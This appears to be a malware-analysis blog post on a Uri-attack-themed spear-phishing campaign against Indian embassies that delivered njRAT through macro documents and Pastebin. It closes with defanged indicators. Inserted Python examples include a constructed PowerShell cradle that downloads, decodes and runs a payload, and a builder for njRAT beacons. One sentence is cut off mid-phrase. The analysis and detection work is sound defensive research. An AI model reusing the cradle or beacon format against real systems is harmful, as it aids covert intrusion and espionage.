# Uri Terror Attack Spear Phishing Emails Targeting Indian Embassies and Indian MEA

cysinfo.com/uri-terror-attack-spear-phishing-emails-targeting-indian-embassies-and-indian-mea/ (1/19/2017)

In my [previous blog post](https://cysinfo.com/malware-actors-using-nic-cyber-security-themed-spear-phishing-target-indian-government-organizations/) I described a cyber attack targeting Indian government organizations. This blog post describes another attack campaign, in which the attackers used [Uri terror attack](https://en.wikipedia.org/wiki/2016_Uri_attack) and Kashmir protest themed spear phishing emails to target officials in the Indian Embassies and the Indian Ministry of External Affairs (MEA).

To infect the victims, the attackers distributed spear-phishing emails carrying a malicious Word document which dropped malware capable of spying on the infected system. The emails purported to come from legitimate email IDs: the attackers spoofed email IDs associated with the Indian Ministry of Home Affairs (MHA) to send the emails to the victims. The attackers also used the name of a top-ranking official of the Ministry of Home Affairs in the email signature, so that the email appeared to have been sent by a high-ranking Government official associated with the MHA.

**Overview of the Malicious Emails**

In the first wave of the attack, the attackers spoofed an email ID associated with the Indian Ministry of Home Affairs (MHA) and, on September 20th, 2016 (just 2 days after the Uri terror attack), sent an email to an email ID associated with the Indian Embassy in Japan. The email was made to look as if an investigation report on the Uri terror attack was being shared by the MHA official. This email contained a malicious Word document (Uri Terror Report.doc), as shown in the screenshot below.

On September 20th, 2016 a similar Uri Terror report themed email was also sent to an email ID connected with the Indian Embassy in Thailand.
This email was later forwarded on October 24th, 2016, from a spoofed email ID associated with the Indian Embassy in Thailand, to various email recipients connected to the Indian Ministry of External Affairs, as shown in the screenshot below. This email also contained the same malicious Word document (Uri Terror Report.doc).

In the second wave of the attack a slightly different theme was used: this time the attackers used the Jammu & Kashmir protests to lure the victims. Again the attackers spoofed an email ID associated with the Indian Ministry of Home Affairs, and the mail was sent on September 1st, 2016 to an email ID associated with the Indian Embassy in Thailand. This email was later forwarded on October 24th, 2016, from a spoofed email ID of the Indian Embassy in Thailand, to various email recipients connected to the Indian Ministry of External Affairs (MEA). This time the email was made to look as if an investigation report on the Jammu & Kashmir protests was being shared by the Ministry of Home Affairs official, and the forwarded email was made to look as if the report had been forwarded by an Ambassador at the Indian Embassy in Thailand to the MEA officials. This email contained a different malicious Word document (mha-report.doc), as shown in the screenshot below.

From the emails (and the attachments) it appears that the goal of the attackers was to infect and take control of the systems and to spy on the actions of the Indian Government following the Jammu & Kashmir protests and the Uri terror attack.

Both documents (Uri Terror Report.doc and mha-report.doc) displayed the same content and contained a Show Document button, as shown below. In both documents the malicious macro code was heavily obfuscated (it used obscure variable/function names to make analysis harder) and did not contain any auto-execute functions. The malicious activity is triggered only on user interaction; attackers use this technique to bypass sandbox/automated analysis, which typically opens the document but never clicks anything in it.
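The trigger pattern described above (no AutoOpen-style handler; the payload runs only from a button click or a document close) is something worth checking for before detonating a document. The following Python script is an added example written for this post, not code from the documents or from the author: it runs a small VBA procedure parser over constructed macro sources that mirror the described behaviour (the helper routine Zqxv and all procedure bodies are invented; only the names Bulbaknopka, chugnnarabashkoim and CommandButton1_Click come from the analysis), buckets event handlers into open, close and user-interaction triggers, and follows calls from each handler to see whether it reaches Shell/CreateObject-style primitives.

```python
import re

# Constructed VBA sources modelled on the behaviour described in the analysis;
# they are NOT the macro code from Uri Terror Report.doc or mha-report.doc.
# Routine names other than the event handlers and the two named obfuscated
# functions are invented stand-ins.
SAMPLE_MHA_REPORT = """
Private Sub CommandButton1_Click()
    Bulbaknopka
End Sub

Private Sub Bulbaknopka()
    Dim sh As Object
    Set sh = CreateObject(Zqxv("WScript.Shell"))
End Sub

Private Function Zqxv(s As String) As String
    Zqxv = s
End Function
"""

SAMPLE_URI_REPORT = """
Private Sub Document_Close()
    chugnnarabashkoim
End Sub

Private Sub CommandButton1_Click()
    chugnnarabashkoim
End Sub

Private Sub chugnnarabashkoim()
    Shell "powershell -w hidden -enc QQBB", vbHide
End Sub
"""

# Control sample: a classic auto-executing macro that any sandbox would fire.
SAMPLE_AUTOOPEN = """
Sub AutoOpen()
    Shell "calc.exe"
End Sub
"""

# Handlers Word runs on open (what sandboxes rely on), on close, or only on
# user interaction with a form control.
OPEN_TRIGGER = re.compile(r"^(AutoOpen|AutoExec|AutoNew|Document_Open|Document_New|Workbook_Open)$", re.I)
CLOSE_TRIGGER = re.compile(r"^(AutoClose|AutoExit|Document_Close|Workbook_Close|Workbook_BeforeClose)$", re.I)
USER_TRIGGER = re.compile(r"^\w+_(Click|DblClick|Change|MouseDown|KeyPress)$", re.I)

PROC_RE = re.compile(
    r"^[ \t]*(?:Private|Public|Friend)?[ \t]*(?:Sub|Function)[ \t]+(\w+)[ \t]*\(.*?\n"
    r"(.*?)^[ \t]*End[ \t]+(?:Sub|Function)",
    re.I | re.M | re.S)
SUSPICIOUS = ("shell", "createobject", "wscript", "powershell", "environ", "urldownloadtofile")


def parse_procedures(vba):
    """Map each Sub/Function name to its body text."""
    return {m.group(1): m.group(2) for m in PROC_RE.finditer(vba)}


def reachable(procs, start):
    """Procedures transitively called from `start` (names matched on word boundaries)."""
    seen, todo = {start}, [start]
    while todo:
        body = procs[todo.pop()]
        for name in procs:
            if name not in seen and re.search(r"\b%s\b" % re.escape(name), body):
                seen.add(name)
                todo.append(name)
    return seen - {start}


def classify_macro(vba):
    """Report which event handlers exist and which of them reach suspicious calls."""
    procs = parse_procedures(vba)
    report = {"open_trigger": [], "close_trigger": [], "user_trigger": [], "suspicious_reached": {}}
    kinds = (("open_trigger", OPEN_TRIGGER), ("close_trigger", CLOSE_TRIGGER), ("user_trigger", USER_TRIGGER))
    for name in procs:
        for kind, rx in kinds:
            if rx.match(name):
                report[kind].append(name)
                chain = [name] + sorted(reachable(procs, name))
                hits = [p for p in chain if any(s in procs[p].lower() for s in SUSPICIOUS)]
                if hits:
                    report["suspicious_reached"][name] = hits
                break
    # Nothing fires on open, but a click/close handler leads to a dangerous
    # primitive: the shape that lets a document sit idle in an automated sandbox.
    report["sandbox_evasion"] = (not report["open_trigger"]
                                 and bool(report["user_trigger"] or report["close_trigger"])
                                 and bool(report["suspicious_reached"]))
    return report


if __name__ == "__main__":
    for label, src in (("mha-report.doc", SAMPLE_MHA_REPORT),
                       ("Uri Terror Report.doc", SAMPLE_URI_REPORT),
                       ("control", SAMPLE_AUTOOPEN)):
        print(label, classify_macro(src))
```

For real documents, feed the VBA source extracted with olevba (oletools) into classify_macro. Note that olevba lists Document_Close among its AutoExec keywords, but a sandbox that never closes the document will not fire it, which is why close handlers are kept in their own bucket here.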
Reverse engineering both Word documents (Uri Terror Report.doc and mha-report.doc) showed similar behaviour, except for the minor difference noted below.

In the case of mha-report.doc the malicious activity is triggered only when the Show Document button is clicked. When this happens the macro code calls the subroutine CommandButton1_Click(), which in turn calls a malicious obfuscated function (Bulbaknopka()), as shown in the screenshot below.

In the case of Uri Terror Report.doc the malicious activity is triggered either when the document is closed or when the Show Document button is clicked. When either of these events occurs, a malicious obfuscated function (chugnnarabashkoim()) gets called, as shown below.

The malicious macro code first decodes a string containing a Pastebin URL. The macro then decodes a PowerShell script which downloads base64 encoded content from that Pastebin URL. The screenshot below shows the network traffic generated by the macro code executing the PowerShell script, and the following screenshot shows the malicious base64 encoded content hosted at the Pastebin link.

The base64 encoded content downloaded from the Pastebin link is then decoded into an executable and dropped on the system. Hosting malicious code on a legitimate site like Pastebin has advantages for the attacker: a request to such a site is unlikely to raise suspicion in security monitoring, and it bypasses reputation-based devices that would block a freshly registered attacker domain. The screenshot below shows the file (officeupdate.exe) decoded and dropped on the system. The dropped file was determined to be a modified version of the njRAT trojan. The dropped file (officeupdate.exe) is then executed by the macro code via the PowerShell script. njRAT is a Remote Access Tool (RAT) used mostly by actor groups in the Middle East.
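To reproduce the payload stage offline, here is an added Python example (mine, not the macro's actual PowerShell script or anything from the post): it takes a constructed download cradle of the shape described above (the Pastebin path EXAMPLE1 is invented), extracts the URL and names the download/decode/drop/execute stages, then base64-decodes a constructed response the way the script does and checks for an MZ/PE header before hashing the result and comparing it with the dropped-sample MD5s listed in the Indicators of Compromise section.

```python
import base64
import hashlib
import re
import struct

# Constructed stand-in for the PowerShell download cradle that the macro
# decodes and runs. It is NOT the script from the documents and the Pastebin
# path is invented; only the shape (fetch text, base64-decode, write to disk,
# run) follows the behaviour described in the analysis.
CRADLE = (
    "$u='http://pastebin.com/raw/EXAMPLE1';"
    "$d=(New-Object Net.WebClient).DownloadString($u);"
    "$p=\"$env:TEMP\\officeupdate.exe\";"
    "[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String($d));"
    "Start-Process $p -WindowStyle Hidden"
)

# Paste services commonly abused as "legitimate" payload hosts. The post only
# names Pastebin; the other hosts are added here as an assumption for the check.
PASTE_HOSTS = ("pastebin.com", "paste.ee", "hastebin.com", "ghostbin.co")
URL_RE = re.compile(r"https?://[\w.\-]+(?:/[\w./\-?=&%]*)?", re.I)
STAGES = {
    "download": re.compile(r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "drop_to_disk": re.compile(r"WriteAllBytes|Set-Content|Out-File", re.I),
    "execute": re.compile(r"Start-Process|Invoke-Expression|\biex\b|Invoke-Item", re.I),
}

# MD5s of the dropped samples from the Indicators of Compromise section.
KNOWN_BAD_MD5 = {
    "84d9d0524e14d9ab5f88bbce6d2d2582": "officeupdate.exe",
    "14b9d54f07f3facf1240c5ba89aa2410": "googleupdate.exe",
    "2b0bd7e43c1f98f9db804011a54c11d6": "malib.dll",
    "feec4b571756e8c015c884cb5441166b": "msccvs.dll",
}


def analyse_cradle(script):
    """Pull the payload URL(s) out of a decoded cradle and name the stages it contains."""
    urls = URL_RE.findall(script)
    return {
        "urls": urls,
        "paste_site": any(h in u.lower() for u in urls for h in PASTE_HOSTS),
        "stages": [stage for stage, rx in STAGES.items() if rx.search(script)],
    }


def fake_pe():
    """Minimal PE-shaped blob (constructed) standing in for the hosted payload."""
    blob = bytearray(0x80 + 24)
    blob[0:2] = b"MZ"
    struct.pack_into("<I", blob, 0x3C, 0x80)   # e_lfanew points at the PE signature
    blob[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", blob, 0x84, 0x14C)  # IMAGE_FILE_MACHINE_I386
    return bytes(blob)


# What the cradle would receive from the paste URL: base64 text of the binary.
PASTE_RESPONSE = base64.b64encode(fake_pe()).decode()
NOT_PE_RESPONSE = base64.b64encode(b"just some text, not a binary").decode()


def triage_payload(b64text):
    """Decode the fetched text as the cradle does, check for a PE header, hash, match IOCs."""
    data = base64.b64decode("".join(b64text.split()), validate=True)
    is_pe = False
    if len(data) >= 0x40 and data[:2] == b"MZ":
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        is_pe = data[e_lfanew:e_lfanew + 4] == b"PE\0\0"
    md5 = hashlib.md5(data).hexdigest()
    return {
        "size": len(data),
        "is_pe": is_pe,
        "md5": md5,
        "sha256": hashlib.sha256(data).hexdigest(),
        "ioc_match": KNOWN_BAD_MD5.get(md5),
    }


if __name__ == "__main__":
    print(analyse_cradle(CRADLE))
    print(triage_payload(PASTE_RESPONSE))
```

When working from a real capture, paste the raw body of the Pastebin response into triage_payload; the whitespace stripping handles the line-wrapped base64 that paste sites return, and validate=True makes a truncated or HTML-wrapped response fail loudly instead of producing a corrupt binary.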
Once a system is infected, njRAT communicates with the attacker and allows the attacker to log keystrokes, upload/download files, access the victim's web

**Analysis of the Dropped Executable (officeupdate.exe)**

The dropped file was analyzed in an isolated environment (without actually allowing it to connect to the C2 server). This section contains the behavioral analysis of the dropped executable.

Once the dropped file (officeupdate.exe) is executed, the malware drops additional files (googleupdate.exe, malib.dll and msccvs.dll) into the %AllUsersProfile%\Google directory and then executes the dropped googleupdate.exe. The malware then communicates with the C2 server (khanji[.]ddns[.]net) on port 5555.

**C2 Communication Pattern**

Upon execution the malware connects to the C2 server on port 5555 and sends the system and operating system information, along with some base64 encoded strings, to the attacker, as shown below. The strings passed in the C2 communication are:

_WIN-T9UN4HIIHEC: the hostname of the infected system_
_Administrator: the username_
_16-12-04: the infection date_
_No: indicates that the system has no camera_

The screenshot below shows the base64 decoded strings associated with the C2 communication. The decoded string is:

_Process Hacker [WIN-T9UN4HIIHEC\Administrator]+: the title of the currently open window. In my case I was using a tool called Process Hacker. The open-window information lets the attacker know what tools are running on the system, and in particular whether analysis tools are being used to inspect the malware._

**C2 Domain Information**

This section contains the details of the C2 domain (khanji[.]ddns[.]net). The attackers used Dynamic DNS to host the C2 server; this allows them to quickly re-point the domain to a new IP address if the C2 server infrastructure becomes unavailable, and it is why the IP-based indicators below should be treated as historical rather than current.
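The fields above are what the njRAT client sends in its registration message. The Python below is an added example written for this post, not njRAT code or anything from the author: it builds and parses a beacon carrying the values reported above, using the field layout documented in public analyses of the stock njRAT 0.7d client (an ASCII length prefix, a NUL byte, then fields separated by the literal delimiter |'|'|, with base64 for the campaign tag and the window title). That layout, and the use of UTF-8 inside the base64 fields, are assumptions about the format rather than something the post states; the OS string and campaign tag are constructed. It also flags window titles naming analysis tools, since that is exactly what tips the operator off.

```python
import base64

# Assumed layout of the njRAT 0.7d registration ("ll") message, taken from
# public analyses of the stock client (e.g. Fidelis FTA-1009 in the references),
# NOT from this post: "<len>\x00" followed by fields joined with |'|'|.
DELIM = "|'|'|"
ANALYSIS_TOOLS = ("process hacker", "procmon", "process monitor", "wireshark",
                  "x64dbg", "x32dbg", "ollydbg", "ida pro", "ida64", "fiddler", "regshot")


def b64(text):
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


def unb64(text):
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except Exception:
        return None


def build_beacon(tag, hostname, user, date, os_name, camera, version, window):
    """Assemble a registration message the way the stock client does (assumed layout)."""
    fields = ["ll", b64(tag), hostname, user, date, "", os_name, camera, version, "..", b64(window), ""]
    body = DELIM.join(fields)
    return f"{len(body)}\x00{body}".encode("utf-8")


# Constructed beacon using the values reported for the analysis VM above.
SAMPLE_BEACON = build_beacon(
    tag="1A2B3C4D_campaign",                 # constructed: volume serial + builder tag
    hostname="WIN-T9UN4HIIHEC",
    user="Administrator",
    date="16-12-04",
    os_name="Win 7 Professional SP1 x86",   # constructed OS string
    camera="No",
    version="0.7d",
    window="Process Hacker [WIN-T9UN4HIIHEC\\Administrator]+",
)


def parse_beacon(raw):
    """Parse a length-prefixed njRAT 'll' message; return None if it is not one."""
    head, sep, body = raw.partition(b"\x00")
    if not sep or not head.isdigit() or int(head) != len(body):
        return None
    parts = body.decode("utf-8", "replace").split(DELIM)
    if len(parts) < 11 or parts[0] != "ll":
        return None
    return {
        "campaign_tag": unb64(parts[1]),
        "hostname": parts[2],
        "user": parts[3],
        "infection_date": parts[4],
        "os": parts[6],
        "camera": parts[7],
        "version": parts[8],
        "active_window": unb64(parts[10]),
    }


def triage_beacon(raw):
    """Parse the beacon and flag analysis tools the operator would see in the window title."""
    info = parse_beacon(raw)
    if info is None:
        return None
    title = (info["active_window"] or "").lower()
    info["analysis_tools_seen"] = [t for t in ANALYSIS_TOOLS if t in title]
    return info


if __name__ == "__main__":
    print(SAMPLE_BEACON)
    print(triage_beacon(SAMPLE_BEACON))
```

The literal |'|'| delimiter in the first packet is a cheap network signature for stock njRAT builds; a modified builder like the one discussed later in this post may change it, so pair it with the dynamic-DNS hostname and the port 5555 destination observed in this campaign.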
The C2 domain was associated with multiple IP addresses in the past, as shown below. During the timeline of this cyber attack most of these IP addresses were located in Pakistan, and a few used hosting provider infrastructure, as shown in the screenshot below. The following screenshot shows the timeline during which each of these IP addresses was active.

The C2 domain (khanji[.]ddns[.]net) was also found to be associated with multiple malware samples in the past. Some of those samples connected to Pastebin URLs upon execution, which matches the behaviour described above.

**Threat Intelligence**

From the base64 encoded content posted on Pastebin, the user ID associated with the Pastebin post was determined. The same user made multiple similar posts, most of them containing similar base64 encoded content (probably used by the malware in other campaigns to decode and drop the malware executable); these posts were made between July 21st, 2016 and September 30th, 2016. The screenshot below shows the posts made by the user. The hits column gives an idea of the number of times each link was visited (probably by the malicious macro code), which in turn gives a rough idea of the number of users who were probably infected by opening the malicious document. Hit counts also include visits by analysts and automated sandboxes, so they are an upper bound.

The screenshot below shows one of the posts containing base64 encoded data, made by the user on September 26th, 2016.

A Google search for the Pastebin user ID led me to a YouTube video posted by an individual demonstrating his modified version of the njRAT control panel/builder kit. The Pastebin user ID matched the email ID mentioned by this individual in the YouTube video description, as shown below. This individual also used a specific keyword in his Skype ID, Twitter ID and YouTube username. The same keyword was found in the njRAT C2 communication used in this attack, as shown below.

After inspecting the njRAT builder kit it was determined that this individual had customized the existing njRAT builder kit to bypass security products. The product information in the builder kit matched this individual's YouTube username and YouTube channel. The njRAT used in this cyber attack was built from this builder kit. Based on this information it can be concluded that the espionage actors used this individual's modified version of njRAT in this cyber attack.

Even though this individual's email ID matched the Pastebin ID under which the base64 encoded malicious code was posted, it is hard to say whether or not this individual was involved in this cyber attack. It is possible that the espionage actors used his public identity as a diversion to mislead investigators and hide the real identity of the attackers; it is also possible that this individual was hired to carry out the attack.

**Indicators Of Compromise**

The indicators are provided below; organizations (Government, public and private) can use them to detect and investigate this attack campaign.
**_Dropped Malware Samples (MD5):_**

_14b9d54f07f3facf1240c5ba89aa2410 (googleupdate.exe)_
_2b0bd7e43c1f98f9db804011a54c11d6 (malib.dll)_
_feec4b571756e8c015c884cb5441166b (msccvs.dll)_
_84d9d0524e14d9ab5f88bbce6d2d2582 (officeupdate.exe)_

**_C2 Domain:_**

_khanji[.]ddns[.]net (port 5555)_

**_IP Addresses Associated with the C2 Domain:_**

_139[.]190[.]6[.]180_
_39[.]40[.]141[.]25_
_175[.]110[.]165[.]110_
_39[.]40[.]44[.]245_
_39[.]40[.]67[.]219_
_119[.]160[.]68[.]178_
_175[.]107[.]13[.]215_
_39[.]47[.]125[.]110_
_175[.]107[.]5[.]247_
_175[.]107[.]6[.]174_
_182[.]191[.]90[.]91_
_175[.]107[.]7[.]50_
_182[.]191[.]90[.]92_
_175[.]107[.]7[.]69_
_39[.]47[.]84[.]127_
_192[.]169[.]136[.]121_
_155[.]254[.]225[.]24_
_203[.]31[.]216[.]214_
_45[.]42[.]243[.]20_

**_Pastebin URLs Hosting the Malicious Payload:_**

_hxxp://pastebin.com/raw/5j4hc8gT_
_hxxp://pastebin.com/raw/6bwniBtB_

**_Related Malware Samples Associated with the C2 Domain (khanji[.]ddns[.]net), MD5:_**

_028caf3b1f5174ae092ecf435c1fccc2_
_7732d5349a0cfa1c3e4bcfa0c06949e4_
_9909f8558209449348a817f297429a48_
_63698ddbdff5be7d5a7ba7f31d0d592c_
_7c4e60685203b229a41ae65eba1a0e10_
_e2112439121f8ba9164668f54ca1c6af_
_784b6e13f195236304e1c172dcdab51f_
_b0f0350a5c2480d8419d14ec3445b765_
_9a51db9889d4fd6d02bdb35bd13fb07e_
_8199667bad5559ee8f04fd6b1a587a75_
_7ad6aaa107a7616a3dbe8e3babf5d310_

**Conclusion**

The attackers in this case made every attempt to launch a clever attack campaign, spoofing legitimate email IDs and using an email theme relevant to the targets. The following factors in this cyber attack suggest the possible involvement of a Pakistan state-sponsored cyber espionage group, whose main aim was to spy on India's actions related to these geopolitical events (the Uri terror attack and the Jammu & Kashmir protests):

_Victims/targets chosen (Indian Embassy and Indian MEA officials)_
_Use of an email theme related to geopolitical events of interest to the targets_
_Timing of the spear phishing emails sent to the victims_
_Location of the C2 infrastructure_

The following techniques were used to gain long-term access by evading anti-virus, sandbox and security monitoring at both the desktop and network levels:

_Use of obfuscated malicious macro code_
_Use of macro code that triggers only on user interaction (to bypass sandbox analysis)_
_Use of a legitimate site (Pastebin) to host malicious code (to bypass security monitoring)_
_Use of a customized njRAT (capable of evading anti-virus)_
_Use of Dynamic DNS to host the C2 infrastructure_

I would like to thank [Brian Rogalski](https://twitter.com/br0g_RE) who, after reading my [previous blog post](https://cysinfo.com/malware-actors-using-nic-cyber-security-themed-spear-phishing-target-indian-government-organizations/), shared a malicious document which he thought was similar to the document mentioned in that post. The malicious document shared by Brian triggered this investigation and helped me identify the related emails and documents associated with this cyber attack.

**References**

https://www.zscaler.com/blogs/research/njrat-h-worm-variant-infections-continue-rise
http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf
https://www.eff.org/files/2013/12/28/quantum_of_surveillance4d.pdf
https://www.symantec.com/connect/blogs/simple-njrat-fuels-nascent-middle-east-cybercrime-scene

Follow us on Twitter: [@monnappa22](https://twitter.com/monnappa22) [@cysinfo22](https://twitter.com/cysinfo22)